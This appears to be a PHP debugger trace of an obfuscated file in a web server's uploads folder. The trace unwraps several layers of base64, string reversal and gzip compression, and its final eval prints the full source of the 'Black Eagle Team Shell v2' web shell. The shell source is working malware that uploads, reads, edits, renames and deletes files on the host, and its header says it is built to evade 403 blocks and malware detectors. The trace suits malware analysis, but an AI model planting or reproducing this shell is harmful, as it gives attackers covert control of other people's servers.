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"; eval(htmlspecialchars_decode(urldecode(base64_decode($p3mu14)))); exit; ?>\n\n<!-- Downloaded From: https://shell.prinsh.com -->\n' /var/www/html/uploads/encoded.php 1 0
2 A /var/www/html/uploads/encoded.php(1) : eval()'d code 4 $p3mu14 = 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
2 A /var/www/html/uploads/encoded.php(1) : eval()'d code 4 $arif = '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
3 8 0 0.001159 420496 base64_decode 0 /var/www/html/uploads/encoded.php(1) : eval()'d code 4 1 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
3 8 1 0.001180 420688
3 8 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
3 9 0 0.001199 420656 urldecode 0 /var/www/html/uploads/encoded.php(1) : eval()'d code 4 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
3 9 1 0.001216 420816
3 9 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
3 10 0 0.001234 420624 htmlspecialchars_decode 0 /var/www/html/uploads/encoded.php(1) : eval()'d code 4 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
3 10 1 0.001252 420656
3 10 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
3 11 0 0.001281 423048 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));' /var/www/html/uploads/encoded.php(1) : eval()'d code 4 0
4 12 0 0.001299 423048 strrev 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
4 12 1 0.001327 427176
4 12 R 'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
4 13 0 0.001356 427144 base64_decode 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
4 13 1 0.001392 431272
4 13 R '\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
4 14 0 0.001491 427144 gzinflate 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 '\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
4 14 1 0.001591 430248
4 14 R '\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
4 15 0 0.001689 426120 gzinflate 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 '\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
4 15 1 0.001783 429224
4 15 R '\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
4 16 0 0.001879 426120 gzinflate 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 '\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
4 16 1 0.001993 429224
4 16 R 'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
4 17 0 0.002089 426120 gzuncompress 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 'x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026'
4 17 1 0.002184 429224
4 17 R 'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
4 18 0 0.002280 426120 gzuncompress 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 1 'x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\023F*��\026�\b��ޥdj�x'
4 18 1 0.002422 438440
4 18 R '<?php\r\n/*\r\n Black Eagle Team Shell v2\r\n By : Bo0G3yM4n\r\n Thanks To : Black Eagle Team, Dark Clown Security\r\n Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname = "Black Eagle Team" . " Minishell";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\'
4 19 0 0.002739 493688 eval 1 '?><?php\r\n/*\r\n Black Eagle Team Shell v2\r\n By : Bo0G3yM4n\r\n Thanks To : Black Eagle Team, Dark Clown Security\r\n Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v\r\n Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\r\n*/\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nerror_log(0);\r\n$sname = "Black Eagle Team" . " Minishell";\r\n$__gcdir = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\r\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\r\n$__scdir = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\r\n$rm__dir = "\\x72\\x6d\\x64" . "ir";\r\n$un__link = "\\x75\\x6e" . "\\x6c\\x69\\x6e\\x6b";\r\nif (get_magic_quotes_gpc()) {\r\n foreach ($_POST as $key => $value) {\r\n $_POST[$key] = stripslashes($value);\r\n }\r\n}\r\necho \'<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<meta name="robots" content"noindex. nofollow">\r\n<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">\r\n<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">\r\n<title>\'.$sname.\'</title>\r\n<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\r\n<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body>\';\r\necho \'<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>\' . $sname . \'</center></h1></div>\';\r\nif (isset($_GET[\'path\'])) {\r\n $path = $_GET[\'path\'];\r\n chdir($_GET[\'path\']);\r\n} else {\r\n $path = $__gcdir();\r\n}\r\n$path = str_replace("\\\\", "/", $path);\r\n$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';\r\necho "<font style=\'font-size:13px;\'>Path: ";\r\nforeach ($paths as $id => $pat) {\r\n echo "<a style=\'font-size:13px;\' href=\'?path=";\r\n for ($i = 0; $i <= $id; $i++) {\r\n echo $paths[$i];\r\n if ($i != $id) {\r\n echo "/";\r\n }\r\n }\r\n echo "\'>$pat</a>/";\r\n}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif (isset($_FILES[\'file\'])) {\r\n if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {\r\n echo \'<center><font color="#00ff00">Upload Berhasil!!</font></center><br/>\';\r\n } else {\r\n echo \'<center><font color="red">Upload Gagal!!</font></center><br/>\';\r\n }\r\n}\r\necho \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';\r\necho \'\';\r\nif (isset($_GET[\'filesrc\'])) {\r\n echo \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';\r\n echo "" . basename($_GET[\'filesrc\']);\r\n ""; \r\n echo \'</tr></td></table><br />\';\r\n echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");\r\n} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {\r\n echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';\r\n if ($_POST[\'opt\'] == \'rename\') {\r\n if (isset($_POST[\'newname\'])) {\r\n if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {\r\n echo \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n }\r\n $_POST[\'name\'] = $_POST[\'newname\'];\r\n }\r\n echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>\';\r\n } elseif ($_POST[\'opt\'] == \'edit\') {\r\n if (isset($_POST[\'src\'])) {\r\n $fp = fopen($_POST[\'path\'], \'w\');\r\n if (fwrite($fp, $_POST[\'src\'])) {\r\n echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';\r\n }\r\n fclose($fp);\r\n }\r\n echo \'<form method="POST"><textarea cols=80 rows=20 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>\';\r\n }\r\n echo \'</center>\';\r\n} else {\r\n echo \'</table><br /><center>\';\r\n if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {\r\n if ($_POST[\'type\'] == \'dir\') {\r\n if ($rm__dir($_POST[\'path\'])) {\r\n echo \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n } else {\r\n echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';\r\n }\r\n } elseif ($_POST[\'type\'] == \'file\') {\r\n if ($un__link($_POST[\'path\'])) {\r\n echo \'<font color="#00ff00">Delete File Done.</font><br />\';\r\n } else {\r\n echo \'<font color="red">Delete File Error.</font><br />\';\r\n }\r\n }\r\n }\r\n echo \'</center>\';\r\n $_scdir = $__scdir($path);\r\n echo \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\n foreach ($_scdir as $dir) {\r\n if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')\r\n continue;\r\n echo "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\n if (is_writable("$path/$dir"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$dir"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$dir");\r\n if (is_writable("$path/$dir") || !is_readable("$path/$dir"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";\r\n echo "</center></td> <td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"> <input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n }\r\n foreach ($_scdir as $file) {\r\n if (!is_file("$path/$file"))\r\n continue;\r\n $size = filesize("$path/$file") / 1024;\r\n $size = round($size, 3);\r\n if ($size >= 1024) {\r\n $size = round($size / 1024, 2) . \' MB\';\r\n } else {\r\n $size = $size . \' KB\';\r\n }\r\n echo "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>" . $size . "</center></td><td><center>";\r\n if (is_writable("$path/$file"))\r\n echo \'<font color="#00ff00">\';\r\n elseif (!is_readable("$path/$file"))\r\n echo \'<font color="red">\';\r\n echo perms("$path/$file");\r\n if (is_writable("$path/$file") || !is_readable("$path/$file"))\r\n echo \'</font>\';\r\n echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";\r\n echo "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"> <input type=\\"submit\\" value=\\">>\\" /></form></center></td></tr>";\r\n }\r\n echo \'</table></div>\';\r\n}\r\nfunction perms($file)\r\n{\r\n $perms = fileperms($file);\r\n if (($perms & 0xC000) == 0xC000) {\r\n $info = \'s\';\r\n } elseif (($perms & 0xA000) == 0xA000) {\r\n $info = \'l\';\r\n } elseif (($perms & 0x8000) == 0x8000) {\r\n $info = \'-\';\r\n } elseif (($perms & 0x6000) == 0x6000) {\r\n $info = \'b\';\r\n } elseif (($perms & 0x4000) == 0x4000) {\r\n $info = \'d\';\r\n } elseif (($perms & 0x2000) == 0x2000) {\r\n $info = \'c\';\r\n } elseif (($perms & 0x1000) == 0x1000) {\r\n $info = \'p\';\r\n } else {\r\n $info = \'u\';\r\n }\r\n $info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));\r\n $info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n $info .= (($perms & 0x0002) ? \'w\' : 